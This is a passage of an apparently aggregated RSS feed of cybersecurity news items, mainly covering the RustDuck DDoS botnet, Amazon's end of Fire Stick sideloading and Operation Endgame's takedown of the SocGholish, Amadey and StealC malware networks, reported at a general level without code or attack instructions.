<p>The post <a href="https://gbhackers.com/rustduck-botnet-targets-iot-devices/">New RustDuck Botnet Targets IoT Devices and Servers With Weak Passwords and RCE Exploits</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New RustDuck Botnet Targets IoT Devices and Servers With Weak Passwords and RCE Exploits]]></title>
<description><![CDATA[A sophisticated new botnet family dubbed RustDuck emerged in early 2026, leveraging a two-stage Loader and Core architecture to compromise IoT devices, routers, and enterprise servers through brute-force credential attacks and remote code execution vulnerabilities. RustDuck employs a multi-pronge...]]></description>
<link>https://tsecurity.de/de/3637789/it-security-nachrichten/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637789/it-security-nachrichten/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/</guid>
<pubDate>Wed, 01 Jul 2026 10:08:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated new botnet family dubbed RustDuck emerged in early 2026, leveraging a two-stage Loader and Core architecture to compromise IoT devices, routers, and enterprise servers through brute-force credential attacks and remote code execution vulnerabilities. RustDuck employs a multi-pronged infection…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-rustduck-botnet-targets-iot-devices-and-servers-with-weak-passwords-and-rce-exploits/">New RustDuck Botnet Targets IoT Devices and Servers With Weak Passwords and RCE Exploits</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck Botnet Exploits Telnet, SSH, Android ADB, TP-Link, ZTE, and Jenkins Flaws]]></title>
<description><![CDATA[Built with a two-stage Loader + Core design and increasingly written in Rust, RustDuck is notable for rapid technical iteration, strong anti-analysis features, and a wide set of infection methods. Its primary goal so far is large-scale DDoS, but its propagation techniques let it reach routers, ca...]]></description>
<link>https://tsecurity.de/de/3637714/it-security-nachrichten/rustduck-botnet-exploits-telnet-ssh-android-adb-tp-link-zte-and-jenkins-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637714/it-security-nachrichten/rustduck-botnet-exploits-telnet-ssh-android-adb-tp-link-zte-and-jenkins-flaws/</guid>
<pubDate>Wed, 01 Jul 2026 09:22:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Built with a two-stage Loader + Core design and increasingly written in Rust, RustDuck is notable for rapid technical iteration, strong anti-analysis features, and a wide set of infection methods. Its primary goal so far is large-scale DDoS, but its propagation techniques let it reach routers, cameras, Android devices and servers a broad and growing […]</p>
<p>The post <a href="https://cyberpress.org/rustduck-botnet-expands-attacks/">RustDuck Botnet Exploits Telnet, SSH, Android ADB, TP-Link, ZTE, and Jenkins Flaws</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck: Botnetz-Malware wird von C auf Rust umgebaut und tarnt sich vor Analyse]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – RustDuck nutzt infizierte Router, IP-Kameras und Server für Distributed Denial of Service. Auffällig ist die komplette Umschreibung zentraler Komponenten von C nach Rust sowie ein mehrstufiger Tarnmechanismus, der Analyseumgebungen früh erkennt. Damit verlagert sich der Fok...]]></description>
<link>https://tsecurity.de/de/3637308/it-security-nachrichten/rustduck-botnetz-malware-wird-von-c-auf-rust-umgebaut-und-tarnt-sich-vor-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637308/it-security-nachrichten/rustduck-botnetz-malware-wird-von-c-auf-rust-umgebaut-und-tarnt-sich-vor-analyse/</guid>
<pubDate>Wed, 01 Jul 2026 05:34:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-rustduck-botnet-ddos-evasion-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – RustDuck nutzt infizierte Router, IP-Kameras und Server für Distributed Denial of Service. Auffällig ist die komplette Umschreibung zentraler Komponenten von C nach Rust sowie ein mehrstufiger Tarnmechanismus, der Analyseumgebungen früh erkennt. Damit verlagert sich der Fokus für Verteidiger von einzelnen Fixes auf das Schließen ganzer Angriffswege: schwache Fernzugänge, ungepatchte Geräte und […]</p>
<div><a href="https://www.it-boltwise.de/rustduck-botnetz-malware-wird-von-c-auf-rust-umgebaut-und-tarnt-sich-vor-analyse.html">... den vollständigen Artikel <strong>»RustDuck: Botnetz-Malware wird von C auf Rust umgebaut und tarnt sich vor Analyse«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/rustduck-botnetz-malware-wird-von-c-auf-rust-umgebaut-und-tarnt-sich-vor-analyse.html">RustDuck: Botnetz-Malware wird von C auf Rust umgebaut und tarnt sich vor Analyse</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon Blames Piracy Apps With Malware For Killing New Fire Stick Sideloading]]></title>
<description><![CDATA[Amazon says it is ending sideloading on new Fire Sticks because "apps that facilitate piracy, and other apps, can carry malware," adding that there is "a good amount of evidence" that sideloaded apps may contain unwanted code or behavior. However, the company did not provide specific examples of ...]]></description>
<link>https://tsecurity.de/de/3637046/it-security-nachrichten/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637046/it-security-nachrichten/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading/</guid>
<pubDate>Wed, 01 Jul 2026 01:08:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon says it is ending sideloading on new Fire Sticks because "apps that facilitate piracy, and other apps, can carry malware," adding that there is "a good amount of evidence" that sideloaded apps may contain unwanted code or behavior. However, the company did not provide specific examples of Fire Stick users being harmed. Ars Technica reports: Amazon has released two Fire Stick models that use its proprietary, Linux-based operating system, Vega OS. Previous Fire Sticks ran Fire OS, which is an Android fork based on the Android Open Source Project. One of the biggest differences between Vega OS and Fire OS is that the former doesn't support sideloading. [...] In a recent interview, Or Goren, editor-in-chief of Cord Busters, a UK-based streaming news outlet, noted the negative reaction to Vega being a closed OS. [Aidan Marcuss, VP of Fire TV, advertising, and Appstore] responded, per the publication, by saying that Vega OS was Amazon's opportunity to "innovate and deliver more capabilities, even on the least expensive devices."
 
He also said that making a platform around security and privacy was "sort of utmost in my mind." The statement is somewhat ironic, considering Vega OS blocks custom launchers and other third-party apps that helped users avoid Amazon tracking and ads. Goren asked whether Amazon had evidence that sideloaded devices caused users harm. "Apps that facilitate piracy, and other apps, can carry malware," Marcuss responded. Marcuss also said that there is "a good amount of evidence that apps can carry unwanted code and behavior on them when they're sideloaded."
 
Marcuss didn't provide specific examples of Fire Stick users being hurt by sideloaded apps. There are some potential examples, though. In 2025, Amazon claimed to blacklist (which blocked the apps from being sideloaded to Fire Sticks) four video streaming apps for malicious behavior. At the time, AFTVnews reported that two of the apps served as residential proxy providers and were considered riskware, and that the other two had APK files that were flagged by virus-scanning tools. Safari and Chrome also flagged one of the apps' official websites, the publication reported. And in 2018, a botnet that infected Android devices with cryptocurrency-mining malware appeared on some Fire Sticks, per discussion on XDA Forums. That said, Amazon also has a history of disabling apps that let users circumnavigate its home screen that Fire devices, including Fire Sticks and Fire TVs, have increasingly used for ads. Worth noting: developers can continue sideloading apps onto Vega OS devices if they register them with Amazon.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Amazon+Blames+Piracy+Apps+With+Malware+For+Killing+New+Fire+Stick+Sideloading%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F30%2F2149243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F30%2F2149243%2Famazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/30/2149243/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS]]></title>
<description><![CDATA[A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline.

Researchers at QiAnXin's XLab have tracked it since February 2026, and say the ...]]></description>
<link>https://tsecurity.de/de/3636668/it-security-nachrichten/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636668/it-security-nachrichten/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/</guid>
<pubDate>Tue, 30 Jun 2026 21:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline.

Researchers at QiAnXin's XLab have tracked it since February 2026, and say the real story is not how big it is today, but how fast it is changing.

The end goal is a]]></content:encoded>
</item>
<item>
<title><![CDATA[RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS]]></title>
<description><![CDATA[A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline. Researchers at QiAnXin’s XLab have tracked it since February…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3636660/it-security-nachrichten/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636660/it-security-nachrichten/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/</guid>
<pubDate>Tue, 30 Jun 2026 21:08:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline. Researchers at QiAnXin’s XLab have tracked it since February…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/rustduck-botnet-rebuilds-in-rust-to-hijack-routers-and-servers-for-ddos/">RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-30 21h : 3 posts]]></title>
<description><![CDATA[3 posts were published in the last hour 19:2 : RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS 19:2 : Microsoft Warns Poisoned MCP Tool Descriptions Can Make AI Agents Leak Data 18:32 : libssh2 CVE-2026-55200…
Read more →
The post IT Security News Hourly Summary 2026-06-30...]]></description>
<link>https://tsecurity.de/de/3636659/it-security-nachrichten/it-security-news-hourly-summary-2026-06-30-21h-3-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636659/it-security-nachrichten/it-security-news-hourly-summary-2026-06-30-21h-3-posts/</guid>
<pubDate>Tue, 30 Jun 2026 21:08:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>3 posts were published in the last hour 19:2 : RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS 19:2 : Microsoft Warns Poisoned MCP Tool Descriptions Can Make AI Agents Leak Data 18:32 : libssh2 CVE-2026-55200…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-30-21h-3-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-30-21h-3-posts/">IT Security News Hourly Summary 2026-06-30 21h : 3 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame Disrupts SocGholish, StealC Malware Networks]]></title>
<description><![CDATA[Operation Endgame has dealt another blow to cybercriminal operations after international law enforcement agencies and private sector partners dismantled infrastructure supporting the SocGholish, Amadey, and StealC malware families. The coordinated operation resulted in the seizure of more than EU...]]></description>
<link>https://tsecurity.de/de/3632249/it-security-nachrichten/operation-endgame-disrupts-socgholish-stealc-malware-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632249/it-security-nachrichten/operation-endgame-disrupts-socgholish-stealc-malware-networks/</guid>
<pubDate>Mon, 29 Jun 2026 09:54:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Operation Endgame Disrupts SocGholish" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Operation Endgame Disrupts SocGholish, StealC Malware Networks 1"></p><p class="isSelectedEnd"><a href="https://thecyberexpress.com/socgholish-malware-hit-in-operation-endgame/" target="_blank" rel="noopener">Operation Endgame</a> has dealt another blow to cybercriminal operations after <a href="https://thecyberexpress.com/first-vpn-service-seized/" target="_blank" rel="noopener">international law enforcement agencies</a> and private sector partners dismantled infrastructure supporting the SocGholish, Amadey, and StealC malware families. The coordinated operation resulted in the seizure of more than EUR 41 million in criminal <a href="https://thecyberexpress.com/cryptocurrency-mixing-service-bitcoin-seized/" target="_blank" rel="noopener">cryptocurrency</a> assets, the recovery of 27 million <a href="https://thecyberexpress.com/phishing-telegram-bots-steal-credentials/" target="_blank" rel="noopener">stolen login credentials</a>, and the disruption of hundreds of servers and domains used to distribute malware.</p>
<p class="isSelectedEnd">Led by <a href="https://thecyberexpress.com/leakbase-cybercrime-forum-taken-down/" target="_blank" rel="noopener">Europol</a> and Eurojust, the operation brought together authorities from Canada, Denmark, Germany, the Netherlands, the United Kingdom, the United States, Microsoft, and several cybersecurity organizations. Officials said the objective was to disrupt the infrastructure cybercriminals rely on to launch <a href="https://thecyberexpress.com/qilin-inc-ransom-drive-2026-ransomware-surge/" target="_blank" rel="noopener">ransomware attacks</a>, financial fraud, and attacks against critical infrastructure.</p>

<h3><strong>Operation Endgame Targets Cybercrime Infrastructure</strong></h3>
<p class="isSelectedEnd">During the coordinated action, authorities targeted the infrastructure supporting <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28868">malware</a> delivery rather than focusing on a single malware family.</p>
<p class="isSelectedEnd">Law enforcement and industry partners took action against 326 servers and 142 domains, significantly disrupting <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28870">malware</a> distribution channels. Investigators also identified and restricted criminal cryptocurrency assets currently valued at more than EUR 41 million (USD 47 million) while recovering approximately 27 million stolen login credentials.</p>
<p class="isSelectedEnd"><a href="https://www.europol.europa.eu/media-press/newsroom/news/global-cyber-strike-disrupts-socgholish-amadey-and-stealc-malware-networks" target="_blank" rel="nofollow noopener">According to Europol</a>, the operation aimed to disrupt the "assembly line" used by cybercriminals to gain initial access to victim systems before deploying ransomware or stealing sensitive information.</p>


[caption id="attachment_112936" align="aligncenter" width="600"]<img class="wp-image-112936 size-full" src="https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Disrupts-SocGholish-e1782715515481.webp" alt="Operation Endgame " width="600" height="400"> Image Soure: Europol[/caption]

[caption id="attachment_112937" align="aligncenter" width="600"]<img class="wp-image-112937 size-full" src="https://thecyberexpress.com/wp-content/uploads/Operation-Endgame-Strikes-Malware-e1782715546803.webp" alt="Operation Endgame Strikes Malware" width="600" height="400"> Image Source: Europol[/caption]
<h3><strong>SocGholish, Amadey and StealC Malware Played Different Roles</strong></h3>
<p class="isSelectedEnd">The operation focused on three malware families that are commonly offered under the cybercrime-as-a-service model.</p>

<ul>
 	<li class="isSelectedEnd"><strong>SocGholish</strong> functioned as a malware loader that distributed fake browser updates through compromised WordPress websites. Users who installed these fake updates unknowingly infected their systems, allowing attackers to gain initial access and later deploy <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28869">ransomware</a> or other malicious tools.</li>
 	<li class="isSelectedEnd"><strong>StealC malware</strong> primarily targeted sensitive information stored on infected devices, including passwords, authentication <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28863">data</a>, and digital identities. The stolen information was later used for <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28867">fraud</a> or traded within cybercriminal marketplaces.</li>
 	<li class="isSelectedEnd"><strong>Amadey</strong> was mainly distributed through <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="28865">phishing</a> campaigns. It provided attackers with initial access to compromised systems while also offering information-stealing capabilities that enabled the theft of sensitive user data.</li>
</ul>
<p class="isSelectedEnd"><a href="https://thecyberexpress.com/?s=Microsoft" target="_blank" rel="noopener">Microsoft</a> reported that during the first two weeks of May 2026 alone, Amadey and StealC malware were linked to more than 140,000 infected computers worldwide.</p>

<h3><strong>Thousands of Infected WordPress Sites Cleaned</strong></h3>
<p class="isSelectedEnd">One of the largest actions under Operation Endgame targeted SocGholish, also known as FakeUpdates.</p>
<p class="isSelectedEnd">Authorities remediated 14,971 infected WordPress websites, including websites belonging to restaurants, automotive repair businesses, and other organizations. Investigators also disabled the SocGholish <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-botnet/" target="_blank" rel="noopener" title="botnet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28866">botnet</a> by taking control of domains and shutting down supporting servers.</p>
<p class="isSelectedEnd">Website owners whose credentials had been exposed were notified through platforms including Have I Been Pwned, DIVD, Spamhaus, CheckjeHack, NoMoreLeaks, Shadowserver, and NL-NCSC.</p>
<p class="isSelectedEnd">The Dutch Police urged <a href="https://thecyberexpress.com/wp-maps-pro-vulnerability/" target="_blank" rel="noopener">WordPress</a> administrators to change passwords, enable multi-factor authentication, remove unknown administrator accounts, and keep their websites updated to reduce future compromise risks.</p>

<h3><strong>SocGholish Linked to Evil Corp</strong></h3>
<p class="isSelectedEnd">Authorities said <strong>SocGholish</strong> has been linked to <a href="https://thecyberexpress.com/russian-state-linked-evil-corp-sanctioned/" target="_blank" rel="noopener">Evil Corp</a>, a Russian cybercriminal group previously associated with the Zeus and Dridex malware families, as well as multiple ransomware and money laundering operations.</p>
<p class="isSelectedEnd">Rather than targeting only malware operators, investigators focused on disrupting the broader infrastructure supporting cybercriminal activity. Europol said this strategy increases operational costs for threat actors and makes large-scale cyberattacks more difficult to execute.</p>

<h3><strong>Europol Coordinates Global Cyber Operation</strong></h3>
<p class="isSelectedEnd">Europol's European <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28864">Cybercrime</a> Centre (EC3) coordinated operational intelligence sharing through SIENA while providing analytical, technical, and cryptocurrency tracing support throughout the investigation.</p>
<p class="isSelectedEnd">The operation forms part of Operation Endgame, described by Europol as the largest international initiative to disrupt ransomware enablers worldwide.</p>
Officials said the latest disruption reflects a growing international strategy of targeting the infrastructure that enables cybercrime operations, rather than responding only after attacks have occurred.]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Endgame: Microsoft zerschlägt 200+ Botnet-Server - Ad-hoc-news.de]]></title>
<description><![CDATA[Microsoft und Europol legen 200 Schadsoftware-Server lahm. Neue Phishing-Kampagnen zielen auf Microsoft-365-Nutzer.]]></description>
<link>https://tsecurity.de/de/3631557/windows-server/operation-endgame-microsoft-zerschlaegt-200-botnet-server-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631557/windows-server/operation-endgame-microsoft-zerschlaegt-200-botnet-server-ad-hoc-newsde/</guid>
<pubDate>Sun, 28 Jun 2026 22:51:44 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft und Europol legen 200 Schadsoftware-<b>Server</b> lahm. Neue Phishing-Kampagnen zielen auf Microsoft-365-Nutzer.]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Best Managed DDoS Testing Services to Stress-Test Without Risking an Outage]]></title>
<description><![CDATA[In this post, I will talk about the best managed DDoS testing services to stress-test without risking an outage. Last year, a single botnet hurled 31.4 Tbps of junk traffic at one target—shattering every distributed-denial-of-service (DDoS) record on the books. Regulators moved fast: under Europe...]]></description>
<link>https://tsecurity.de/de/3631290/it-security-nachrichten/6-best-managed-ddos-testing-services-to-stress-test-without-risking-an-outage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631290/it-security-nachrichten/6-best-managed-ddos-testing-services-to-stress-test-without-risking-an-outage/</guid>
<pubDate>Sun, 28 Jun 2026 18:53:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, I will talk about the best managed DDoS testing services to stress-test without risking an outage. Last year, a single botnet hurled 31.4 Tbps of junk traffic at one target—shattering every distributed-denial-of-service (DDoS) record on the books. Regulators moved fast: under Europe’s NIS2 directive and the new U.S. four-day disclosure rule, boards […]</p>
<p>The post <a href="https://secureblitz.com/best-managed-ddos-testing-services/">6 Best Managed DDoS Testing Services to Stress-Test Without Risking an Outage</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weak Access Controls Leave Enterprise Networks at Risk]]></title>
<description><![CDATA[Barracuda researchers found that weak credentials and exposed remote services continue to fuel malware, botnet, and credential attacks. The post Weak Access Controls Leave Enterprise Networks at Risk  appeared first on eSecurity Planet. This article has been indexed from eSecurity…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3628712/it-security-nachrichten/weak-access-controls-leave-enterprise-networks-at-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628712/it-security-nachrichten/weak-access-controls-leave-enterprise-networks-at-risk/</guid>
<pubDate>Sat, 27 Jun 2026 01:08:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Barracuda researchers found that weak credentials and exposed remote services continue to fuel malware, botnet, and credential attacks. The post Weak Access Controls Leave Enterprise Networks at Risk  appeared first on eSecurity Planet. This article has been indexed from eSecurity…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/weak-access-controls-leave-enterprise-networks-at-risk/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/weak-access-controls-leave-enterprise-networks-at-risk/">Weak Access Controls Leave Enterprise Networks at Risk</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weak Access Controls Leave Enterprise Networks at Risk ]]></title>
<description><![CDATA[Barracuda researchers found that weak credentials and exposed remote services continue to fuel malware, botnet, and credential attacks.
The post Weak Access Controls Leave Enterprise Networks at Risk  appeared first on eSecurity Planet.]]></description>
<link>https://tsecurity.de/de/3628702/it-security-nachrichten/weak-access-controls-leave-enterprise-networks-at-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628702/it-security-nachrichten/weak-access-controls-leave-enterprise-networks-at-risk/</guid>
<pubDate>Sat, 27 Jun 2026 00:52:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Barracuda researchers found that weak credentials and exposed remote services continue to fuel malware, botnet, and credential attacks.</p>
<p>The post <a href="https://www.esecurityplanet.com/threats/weak-access-controls-leave-enterprise-networks-at-risk/">Weak Access Controls Leave Enterprise Networks at Risk </a> appeared first on <a href="https://www.esecurityplanet.com/">eSecurity Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus]]></title>
<description><![CDATA[Written by: Jordan Jones

Introduction 
Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-01...]]></description>
<link>https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</guid>
<pubDate>Thu, 25 Jun 2026 16:09:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jordan Jones</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
